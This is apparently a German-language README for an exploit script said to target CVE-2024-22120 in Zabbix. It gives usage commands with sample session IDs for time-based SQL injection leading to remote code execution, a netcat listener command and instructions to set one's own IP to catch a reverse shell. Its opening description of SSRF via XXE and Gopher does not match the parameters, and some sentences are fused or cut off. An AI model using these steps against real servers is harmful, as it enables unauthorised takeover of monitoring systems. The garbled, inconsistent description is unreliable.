
Dies ist mein Exploit für CVE-2024-22120, der eine SSRF-Sicherheitslücke in einem XXE mit einem Gopher-Payload beinhaltet.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Sie haben einen Zabbix-Server unter der IP 192.168.1.100 identifiziert und haben Zugriff auf einen Benutzer mit niedrigen Privilegien mit den folgenden Details:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gSie möchten die RCE-Schwachstelle mit diesem Skript ausnutzen.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: Die IP-Adresse des Zabbix-Servers.--sid d82bf6715e1d3c1f25: Die Sitzungs-ID eines Benutzers mit niedrigen Privilegien.--hostid 10107: Die ID eines Hosts, auf den der Benutzer mit niedrigen Privilegien zugreifen kann.--phpsessid a4g7f48d9j3r7h8s9g: Die PHP-Sitzungs-ID, die zur Authentifizierung von Anfragen verwendet wird.--false_time 1: Zeit in Sekunden, die bei einer falschen Vermutung während der SQL-Injection gewartet wird (Standard ist 1 Sekunde).--true_time 3: Zeit in Sekunden, die bei einer richtigen Vermutung während der SQL-Injection gewartet wird (Standard ist 3 Sekunden).10.0.46.27:5555 im Skript) herstellt.Stellen Sie sicher, dass Ihr Rechner auf dem angegebenen Port (5555 im Skript) lauscht, um die Reverse-Shell abzufangen. Sie können netcat dafür verwenden:
nc -lvnp 5555
Ersetzen Sie die IP 10.0.46.27 und den Port 5555 in der CreateScript-Funktion durch Ihre eigene IP und den gewünschten Port, um die Reverse-Shell zu empfangen.